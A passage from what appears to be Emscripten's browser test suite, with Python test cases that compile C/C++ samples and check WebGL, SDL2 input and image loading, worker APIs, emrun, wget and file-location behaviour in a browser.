('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=1']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync startup, call too late')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync, runtime still alive, so all good')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
def test_module(self):
return self.skip('non-fastcomp is deprecated and fails in 3.5')
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser(): return self.skip('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
if not has_browser(): return self.skip('need a browser')
Popen([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
browser = get_browser()
if browser is not None:
# If EMSCRIPTEN_BROWSER carried command line arguments to pass to the browser, (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun, so strip them out.
browser_name = shlex.split(browser)[0]
args += ['--browser', browser_name]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
open('pre.js', 'w').write(r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
# Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
def test_webgl_context_params(self):
if WINDOWS: return self.skip('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/kripken/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_codemods(self):
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = '-O' + str(opt_level)
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1']).communicate()
os.mkdir('sub')
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1'] + args).communicate()
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
def test_glfw3(self):
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'], expected='1')
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
if isinstance(SPIDERMONKEY_ENGINE, list) and len(SPIDERMONKEY_ENGINE[0]) != 0:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED','-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, c);
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2','--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
